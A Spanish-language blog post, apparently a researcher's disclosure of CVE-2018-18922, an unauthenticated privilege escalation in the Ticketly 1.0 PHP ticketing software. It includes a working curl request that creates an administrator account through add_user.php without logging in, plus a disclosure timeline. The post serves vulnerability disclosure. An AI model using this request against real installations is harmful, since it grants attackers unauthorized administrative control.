Hoy, publico otra entrada relacionada con vulnerabilidades en aplicaciones web, esta vez, sobre un software de ticketing llamado Ticketly 1.0 desarrollado por AbiSoft. La vulnerabilidad encontrada, permite a un atacante crearse una cuenta de administrador en el sistema mediante una vulnerabilidad de Escalación de Privilegios, la vulnerabilidad ha sido asociada al CVE-2018-18922.
Ticketly – CVE-2018-18922
Ticketly 1.0 – Privilege Escalation (Add Admin Account)
Ticketly 1.0, es un software de ticketing desarrollado por AbiSoft para ofrecer soporte a los usuarios sobre incidencias en los sistemas, está basado en PHP y MySQL.
📅 Vulnerabilidad descubierta por Javier Olmedo el 24/07/2018
💣 Publicada el 05/11/2018
🔗 Link del software Ticketly
🐞 Versión vulnerable = 1.0
Vector de ataque / Criticidad de la explotación
CRITICIDAD – CRÍTICA
A través de las vulnerabilidades de Escalación de Privilegios, un atacante podría obtener acceso a recursos o funciones de la aplicación de los que, normalmente, no le estaría permitido. Esto, generalmente es causado por una falla en la aplicación al comprobar los privilegios del usuario que realiza la acción o una mala configuración por parte del desarrollador/administrador sobre los privilegios previstos a los usuarios.
Parámetro/Recurso vulnerable
El recurso /ticketly/action/add_user.php no realiza una correcta validación de privilegios y permite a un atacante crear una cuenta de administrador sin necesidad de estar autenticado en la aplicación.
Puede explotarse con la siguiente petición curl:
💉 curl -i -s -k -X $’POST’ \
-H $’Host: localhost’ -H $’Content-Type: application/x-www-form-urlencoded; charset=UTF-8′ -H $’Content-Length: 82′ \
–data-binary $’name=Javier&lastname=Olmedo&email=contacto@hackpuntes.com&status=1&password=qwerty’ \
$’http://localhost/ticketly/action/add_user.php’
Prueba de concepto (PoC)
Timeline
24/07/2018 Descubrimiento de la vulnerabilidad
24/07/2018 Contacto con el desarrollador
24/07/2018 El desarrollador marca la vulnerabiliad como pendiente de parcheo
02/11/2018 Solicito CVE
04/11/2018 Asignación de CVE-2018-18922 por MITRE
05/11/2018 Hago pública la vulnerabilidad
Referencias
CVE-MITRE – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18922
Un saludo a todos!! 👋